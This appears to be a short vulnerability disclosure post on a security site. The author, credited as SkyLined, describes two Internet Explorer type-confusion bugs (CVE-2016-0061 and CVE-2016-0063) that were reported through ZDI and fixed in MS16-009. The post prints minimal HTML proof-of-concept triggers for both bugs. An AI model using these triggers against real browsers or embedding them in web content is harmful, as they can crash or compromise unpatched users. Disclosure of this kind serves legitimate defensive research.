Microsoft Internet Explorer Type Confusion

Credit: SkyLined
Risk: High
Local: No
Remote: Yes

Hello everyone, I've recently released examples on twitter of how to trigger two security vulnerabilities in Microsoft Internet Explorer. These issue were discovered last year and reported to Microsoft through ZDI. Microsoft release security updates to address these issues last Tuesday. ====== CVE-2016-0061: MSHTML Form element id type confusion CVE-2016-0061 ZDI-16-162 MS16-009 <meta http-equiv=X-UA-Compatible content=IE=7><form id="&#x4141;&#x4141;"><body onload=opener?opener["\u4141\u4141"]():open("?")> ====== CVE-2016-0063: DOMImplementation method type confusion CVE-2016-0063 ZDI-16-166 MS16-009 <body onload=open("2.html")> (part 1/2) <meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()> (part 2/2) ====== Both were found through fuzzing inspired by Michal Zalewski's cross_fuzz Cheers, SkyLined


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top